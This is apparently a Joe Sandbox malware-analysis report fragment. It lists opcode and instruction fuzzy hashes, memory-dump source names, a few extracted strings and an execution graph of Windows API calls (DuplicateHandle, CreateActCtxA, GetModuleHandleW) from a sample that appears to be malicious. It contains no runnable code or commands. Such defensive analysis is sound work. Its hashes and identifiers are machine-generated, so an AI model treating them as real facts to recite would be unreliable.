                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 45f4650d16b9400f8e21e4c01a97659ff83624e25876f9079ffa89010aebc0e6
                                                                                                                            • Instruction ID: 6f336df713180296c6ad654aca343cd4fb68af20f1331d90c86583417d0235f1
                                                                                                                            • Opcode Fuzzy Hash: 45f4650d16b9400f8e21e4c01a97659ff83624e25876f9079ffa89010aebc0e6
                                                                                                                            • Instruction Fuzzy Hash: 9D41B431A44249DFCF12CFACC844A9DFFB2BF46350F058555E9069B2A2E370E914CB50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 47966071db89931c075ad233c27f2f0d8136846e407b3430d05e9b6e31688a8b
                                                                                                                            • Instruction ID: 934dc958188d730fa12e32c7d27dcd4bd8a721744f13dac5b03d3850cc9f6b62
                                                                                                                            • Opcode Fuzzy Hash: 47966071db89931c075ad233c27f2f0d8136846e407b3430d05e9b6e31688a8b
                                                                                                                            • Instruction Fuzzy Hash: 5B416B306043458FDB12CF68C844B6BBBA6AB89319F4484A6EA58CF296D771DC41CBA1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 03ff1ba15df350b7cc32a9f2fe1f9f336650adecf8df7fa9ddef5624b447be0d
                                                                                                                            • Instruction ID: a1cd0a202c44b8fe6818374846cf87ec4dc61567f0f1e45667a0983241ed0b98
                                                                                                                            • Opcode Fuzzy Hash: 03ff1ba15df350b7cc32a9f2fe1f9f336650adecf8df7fa9ddef5624b447be0d
                                                                                                                            • Instruction Fuzzy Hash: AE31B335701109DFCF069FA8E844A6FBBA2FF58784F004428FA158B250CB35CD61DB91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9c69deab46c82d79be131a833392501fa221981d033ffe3d92b631a14163cae7
                                                                                                                            • Instruction ID: 36c1c2e41d88d777507d4ff28175824de4bc9136d70769818bba18cafe4a456d
                                                                                                                            • Opcode Fuzzy Hash: 9c69deab46c82d79be131a833392501fa221981d033ffe3d92b631a14163cae7
                                                                                                                            • Instruction Fuzzy Hash: 7E313370D152498FCB01DFA8D4446EEBFB5FF4A300F1042AAD915AB221EB340A95CB61
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8b19fac0bb8c4da4b3b024a36cb71562f2db8a0fcef741404e18b51bf2ad40a4
                                                                                                                            • Instruction ID: 4719935de9c64a26597f9bbeb55b5739cf956b927bb9c5340713a725081ee9d0
                                                                                                                            • Opcode Fuzzy Hash: 8b19fac0bb8c4da4b3b024a36cb71562f2db8a0fcef741404e18b51bf2ad40a4
                                                                                                                            • Instruction Fuzzy Hash: 1F2183307002088BDB265EAE845473EF696AFC5758F18807DE506CB799EF65CC429392
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8bdc50fce6b27faa842fcff2b2b3bbaa47f03b29428b030ed09a31021cbd8dc6
                                                                                                                            • Instruction ID: 2697474a934dffd9fb525c958089cc7a243808551984669ce467350ce86ee2b5
                                                                                                                            • Opcode Fuzzy Hash: 8bdc50fce6b27faa842fcff2b2b3bbaa47f03b29428b030ed09a31021cbd8dc6
                                                                                                                            • Instruction Fuzzy Hash: 8621F739A002149FCB14DF2CD840AAE7BB4EF8C360B50C059E9099B345DB35EE42CBD1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b6d24eb7a45778399e4f19c6d0c578ca277c7df3ba3ecfc7490991186a30a05d
                                                                                                                            • Instruction ID: 35899e8087e9e03f984ef5998cdd8536e16dcbbed34daccf953486e38edf5b81
                                                                                                                            • Opcode Fuzzy Hash: b6d24eb7a45778399e4f19c6d0c578ca277c7df3ba3ecfc7490991186a30a05d
                                                                                                                            • Instruction Fuzzy Hash: 9921C3357006518FDB269B2ED454A2EF7A2FF8A7957048469E916DF354CF31DC028B80
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698053010.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_14dd000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f2a577417dd6a250a29b3d65ee49173d11bd6715bb339a4a372aeb93d174fc4a
                                                                                                                            • Instruction ID: 86ffc2f99daa9207b9cad5e6870e98ea89adceaa91d793390437d6af45f9473a
                                                                                                                            • Opcode Fuzzy Hash: f2a577417dd6a250a29b3d65ee49173d11bd6715bb339a4a372aeb93d174fc4a
                                                                                                                            • Instruction Fuzzy Hash: 762103B1904204EFDF16DF64C9D4B26BBA5FB84318F20C56EE9090B3A2C736D447CA62
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9060ae12dd780ffcd0a060f62570e9cee74cfe915ebdd1802c3956cc35b15023
                                                                                                                            • Instruction ID: 24cd8d887e0f4130d18ca8e85b401c83e8f1a11be48c3ba370833d1211caadda
                                                                                                                            • Opcode Fuzzy Hash: 9060ae12dd780ffcd0a060f62570e9cee74cfe915ebdd1802c3956cc35b15023
                                                                                                                            • Instruction Fuzzy Hash: 7B210E31606149DFCF069F68E444AAFBBA1FF59794F004069EA068B254CB34CD61CBA1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5c5175f213d4a0db248ac0b15c1309cdf561fb1e4a7bc2da53567b620b6be36c
                                                                                                                            • Instruction ID: 28fa9238fadca416a113073c01acd846f7d27356b452bd6876535df656a86774
                                                                                                                            • Opcode Fuzzy Hash: 5c5175f213d4a0db248ac0b15c1309cdf561fb1e4a7bc2da53567b620b6be36c
                                                                                                                            • Instruction Fuzzy Hash: 71319078E01308CFCB49DFA9E59499DBBB6FF49314B2040A9E819AB364DB35AD45CF00
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8577b7ed52625407e2d0056c70a89610d72c8c550e623b0d822f47eda262d913
                                                                                                                            • Instruction ID: 845459b6eae4c706f8f42df8811fe7ea823edc336703bead3572b203ddfcec85
                                                                                                                            • Opcode Fuzzy Hash: 8577b7ed52625407e2d0056c70a89610d72c8c550e623b0d822f47eda262d913
                                                                                                                            • Instruction Fuzzy Hash: 91218034E01248DFEF16CFA6D550AEEBFB6EF48209F148059E511AA290DB30D941CB10
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6f3ad1a93ebccbb8a269d31b5888903213de7456be823f7b9465a61a724934dc
                                                                                                                            • Instruction ID: 1ea01631b223c0981c8367f991bd955a8792fb6b939dc10822ecef766836e13d
                                                                                                                            • Opcode Fuzzy Hash: 6f3ad1a93ebccbb8a269d31b5888903213de7456be823f7b9465a61a724934dc
                                                                                                                            • Instruction Fuzzy Hash: AC11A0357456519FDB1A5B2ED86462EFBA2FFCA79131844A9E916CF3A4CF20CC02C790
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b47f5fc23b0b69b8a520deaf47905bcced3fcd284e0c31e96d67026f5283d77a
                                                                                                                            • Instruction ID: 5886fac6c9201fa22fbf05ccd27ecab285a8ecc203677fbb49a77fcd3319e4a8
                                                                                                                            • Opcode Fuzzy Hash: b47f5fc23b0b69b8a520deaf47905bcced3fcd284e0c31e96d67026f5283d77a
                                                                                                                            • Instruction Fuzzy Hash: CC216DB4D002099FEB05DFBAD54079EBFF2FB44304F0481A9C1689B265E7345A45CB81
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 32a97c40df901b82176f35b48a4b510f83c77bdc22e53c821545366b3d284556
                                                                                                                            • Instruction ID: f6b292cc4ecca95b9399b83558810a2749415950b07e2f603814e319f724a3e2
                                                                                                                            • Opcode Fuzzy Hash: 32a97c40df901b82176f35b48a4b510f83c77bdc22e53c821545366b3d284556
                                                                                                                            • Instruction Fuzzy Hash: 6421B974D0120ACFCB01EFA9D8545EEBBF4FF0A300F10566AD815B6220EB301A95CBA1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7ff36469da58e202ca09bef43aec3a18afa995e68c1b965735b56e05289ff13f
                                                                                                                            • Instruction ID: 6a0a8eef797a05f82c396a56460422a3bb2e63cb507e91b7bc3b9be7f5358202
                                                                                                                            • Opcode Fuzzy Hash: 7ff36469da58e202ca09bef43aec3a18afa995e68c1b965735b56e05289ff13f
                                                                                                                            • Instruction Fuzzy Hash: 29113A74D0020D9FEB04EFBAD54069EBBF2FB44300F1485A9C128AB264EB745A45CF82
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698053010.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_14dd000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                                                                                                            • Instruction ID: 30e6de862bd9476b0d8893e67b354639067b4284ca0906d61b7569c6a18e092a
                                                                                                                            • Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                                                                                                            • Instruction Fuzzy Hash: 5B11DCB5904240DFCB16CF24C5D0B16BBA1FB84318F24C6AAD8494B7A3C33AD40ACB52
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 573f33012020204e31a19e93976b69be48d0ba63f1af905f64c0265013815922
                                                                                                                            • Instruction ID: 2fcc1549ba5066accb66290b2560d30aaa3c17bf3b4b7c69c783488ea37f1d77
                                                                                                                            • Opcode Fuzzy Hash: 573f33012020204e31a19e93976b69be48d0ba63f1af905f64c0265013815922
                                                                                                                            • Instruction Fuzzy Hash: 00012832B042596FCF178E54D820AAF7FA6EBD9290B08806BFA15CF285DB718D15C791
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c67ad532c1f40d58999722c96983680b1e61514d67595b2e35ed2332f0fc4333
                                                                                                                            • Instruction ID: 826d3466c4680337bf67525601577b4cdd432afb90389e268f8ae6becd9d3e71
                                                                                                                            • Opcode Fuzzy Hash: c67ad532c1f40d58999722c96983680b1e61514d67595b2e35ed2332f0fc4333
                                                                                                                            • Instruction Fuzzy Hash: BB1135B8D04209DFDF01CFA9E844AAEBBB0FB89300F1080A6D920A7355D7385A45CF91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 067bef18b9dbabec7c014b5530b8d429bd02c01c88341115cbc06a60b6831b4d
                                                                                                                            • Instruction ID: 6715a21d150d2fc455aea9d95bdb01f9005bdd15583b0ee0d060058f9e6ff791
                                                                                                                            • Opcode Fuzzy Hash: 067bef18b9dbabec7c014b5530b8d429bd02c01c88341115cbc06a60b6831b4d
                                                                                                                            • Instruction Fuzzy Hash: 9BF0F631B802144B9B265A2ED854A2AFADEEFC8A513454079E907CB361EF20CC02C394
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8b99ef3838724c98b6925b134f24cb08e55d3bdfc967df8ba0bd9157ff72be90
                                                                                                                            • Instruction ID: a0e1db151bbbffd0c68a37626e62a94dfda6b8352cb75203ba170145b807f4dc
                                                                                                                            • Opcode Fuzzy Hash: 8b99ef3838724c98b6925b134f24cb08e55d3bdfc967df8ba0bd9157ff72be90
                                                                                                                            • Instruction Fuzzy Hash: 60F090329042989FCB12CB799C54AEABFF1EF8A224F0481A7E558CB291D3314955CB51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 318bcf317ed430e555fe34f38f046956412b25b29b18b681bbf512a1f64709ce
                                                                                                                            • Instruction ID: 725523e2a892c9b58b5ab1a8bf09f638978243d37d98edf4936811994687da83
                                                                                                                            • Opcode Fuzzy Hash: 318bcf317ed430e555fe34f38f046956412b25b29b18b681bbf512a1f64709ce
                                                                                                                            • Instruction Fuzzy Hash: B7E02631D943AA8BCB02E7F49C000EEBF34EEC2221B18869BC06137090EB306659C3A1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c7babc938ed08e1b911da0e3cfd93cbd317d3ead45f7fcd06100bd133112d965
                                                                                                                            • Instruction ID: c865b017773249fe6aeb732f1f76da85e6039aeaa223b7fd5a0cf786c28457cf
                                                                                                                            • Opcode Fuzzy Hash: c7babc938ed08e1b911da0e3cfd93cbd317d3ead45f7fcd06100bd133112d965
                                                                                                                            • Instruction Fuzzy Hash: 90E0C23440C3D60FCB17A376AC545497F7AEDA300878884E7E0858E08BEE68184BC363
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 55de8110c671a82a7b340eab8257a7f998ce71403c0766d9aca227c7961d87d9
                                                                                                                            • Instruction ID: 01bee33d49dbe891f419d92e91c8902dac4829102c03bb42200e91b9da9e6017
                                                                                                                            • Opcode Fuzzy Hash: 55de8110c671a82a7b340eab8257a7f998ce71403c0766d9aca227c7961d87d9
                                                                                                                            • Instruction Fuzzy Hash: 46D05B31D2033A57CB10E7A5DC044DFFB38EED5321B514666D51437144FB706659C6E1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1c30f0c6520937765d8807c97c8afea8b8999a958b91ef72ea29bdc9ae72744a
                                                                                                                            • Instruction ID: 197c2776bf46f6f666d8748df971a10f0b4b699d5a8b6597792a9f6705af0dd2
                                                                                                                            • Opcode Fuzzy Hash: 1c30f0c6520937765d8807c97c8afea8b8999a958b91ef72ea29bdc9ae72744a
                                                                                                                            • Instruction Fuzzy Hash: 58D04235E4410DCBCF31DFA8E4844DCFB71EB99365B10546AE925A7251D63054658F11
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f00343672147eb80d077f44246b81726cd65d23703a8b53c23666bb8685f409d
                                                                                                                            • Instruction ID: ad232edd3e28713cac465241cc1808ad638ae6f4a8169915d30a4ce8ea034c42
                                                                                                                            • Opcode Fuzzy Hash: f00343672147eb80d077f44246b81726cd65d23703a8b53c23666bb8685f409d
                                                                                                                            • Instruction Fuzzy Hash: E7D0173BB40008DFCF008F88E8409DDF7B6FB88220B048017E911A3260C6319821CB90
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1940fa85dda37d86c1b209859406528dfd5fab6858eeaf23e530d016feda9ec5
                                                                                                                            • Instruction ID: 1f32a076321afc0d4b15c28fc2adc8a8321c9eabfcac636456662062667d8b96
                                                                                                                            • Opcode Fuzzy Hash: 1940fa85dda37d86c1b209859406528dfd5fab6858eeaf23e530d016feda9ec5
                                                                                                                            • Instruction Fuzzy Hash: CCC012389043194BD949E7B7EC4455A336EEAF05487C08530A1050D149AE781C874791
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3698479905.0000000001740000.00000040.00000800.00020000.00000000.sdmp, Offset: 01740000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_1740000_Ti5nuRV7y4.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: \;q$\;q$\;q$\;q
                                                                                                                            • API String ID: 0-2933265366
                                                                                                                            • Opcode ID: 40e3408af4531d987a92c7174c48590c1e679d967a256524756b6a2276ef544e
                                                                                                                            • Instruction ID: 19944e09eba4fc496aa97302bd178bd1c2671fab38d0836e6cda4d019e07183d
                                                                                                                            • Opcode Fuzzy Hash: 40e3408af4531d987a92c7174c48590c1e679d967a256524756b6a2276ef544e
                                                                                                                            • Instruction Fuzzy Hash: E3018F397001158FD7248A2DC440AA5B7EBAF8A76072941AEF507CF375EFB1DC418750

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:7.9%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:82
                                                                                                                            Total number of Limit Nodes:2
                                                                                                                            execution_graph 29332 2d6d2e0 29333 2d6d326 29332->29333 29337 2d6d4c0 29333->29337 29340 2d6d4b0 29333->29340 29334 2d6d413 29343 2d6af34 29337->29343 29341 2d6d4ee 29340->29341 29342 2d6af34 DuplicateHandle 29340->29342 29341->29334 29342->29341 29344 2d6d528 DuplicateHandle 29343->29344 29345 2d6d4ee 29344->29345 29345->29334 29346 2d64668 29347 2d64672 29346->29347 29351 2d64767 29346->29351 29356 2d63e34 29347->29356 29349 2d6468d 29352 2d6477d 29351->29352 29360 2d64867 29352->29360 29364 2d64868 29352->29364 29357 2d63e3f 29356->29357 29359 2d66f90 29357->29359 29372 2d65ce0 29357->29372 29359->29349 29362 2d6488f 29360->29362 29361 2d6496c 29361->29361 29362->29361 29368 2d644b4 29362->29368 29366 2d6488f 29364->29366 29365 2d6496c 29365->29365 29366->29365 29367 2d644b4 CreateActCtxA 29366->29367 29367->29365 29369 2d658f8 CreateActCtxA 29368->29369 29371 2d659bb 29369->29371 29373 2d65ceb 29372->29373 29376 2d65d00 29373->29376 29375 2d6713d 29375->29359 29377 2d65d0b 29376->29377 29380 2d65d30 29377->29380 29379 2d6721a 29379->29375 29381 2d65d3b 29380->29381 29384 2d65d60 29381->29384 29383 2d6730d 29383->29379 29385 2d65d6b 29384->29385 29387 2d6886b 29385->29387 29391 2d6ab11 29385->29391 29386 2d688a9 29386->29383 29387->29386 29395 2d6cc10 29387->29395 29400 2d6cc00 29387->29400 29405 2d6af50 29391->29405 29409 2d6af40 29391->29409 29392 2d6ab26 29392->29387 29396 2d6cc31 29395->29396 29397 2d6cc55 29396->29397 29424 2d6d1c8 29396->29424 29428 2d6d1b9 29396->29428 29397->29386 29401 2d6cc31 29400->29401 29402 2d6cc55 29401->29402 29403 2d6d1c8 2 API calls 29401->29403 29404 2d6d1b9 2 API calls 29401->29404 29402->29386 29403->29402 29404->29402 29414 2d6b048 29405->29414 29419 2d6b037 29405->29419 29406 2d6af5f 29406->29392 29410 2d6af50 29409->29410 29412 2d6b037 GetModuleHandleW 29410->29412 29413 2d6b048 GetModuleHandleW 29410->29413 29411 2d6af5f 29411->29392 29412->29411 29413->29411 29415 2d6b07c 29414->29415 29416 2d6b059 29414->29416 29415->29406 29416->29415 29417 2d6b280 GetModuleHandleW 29416->29417 29418 2d6b2ad 29417->29418 29418->29406 29420 2d6b07c 29419->29420 29421 2d6b059 29419->29421 29420->29406 29421->29420 29422 2d6b280 GetModuleHandleW 29421->29422 29423 2d6b2ad 29422->29423 29423->29406 29426 2d6d1d5 29424->29426 29425 2d6d20f 29425->29397 29426->29425 29432 2d6cff0 29426->29432 29430 2d6d1d5 29428->29430 29429 2d6d20f 29429->29397 29430->29429 29431 2d6cff0 2 API calls 29430->29431 29431->29429 29433 2d6cffb 29432->29433 29435 2d6db20 29433->29435 29436 2d6d10c 29433->29436 29435->29435 29437 2d6d117 29436->29437 29438 2d65d60 2 API calls 29437->29438 29439 2d6db8f 29438->29439 29439->29435
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1379377880.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_5950000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (oq$4'q$4'q$4'q$4'q$4'q$4'q$4|q$4|q$$q
                                                                                                                            • API String ID: 0-1265471490
                                                                                                                            • Opcode ID: 050ff14feb0114feaaa0b22b4e1dd1f08528582b258e9602ec19c7a1e6b08147
                                                                                                                            • Instruction ID: 253d467c805e1a73f8537c4bf3c6e0e4869c9b1d9ff2697f1b1bf524a684dde2
                                                                                                                            • Opcode Fuzzy Hash: 050ff14feb0114feaaa0b22b4e1dd1f08528582b258e9602ec19c7a1e6b08147
                                                                                                                            • Instruction Fuzzy Hash: 6643D974A00219DFDB24DF68C888A9DB7B6FF49311F158299E909AB361CB30ED91CF54

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
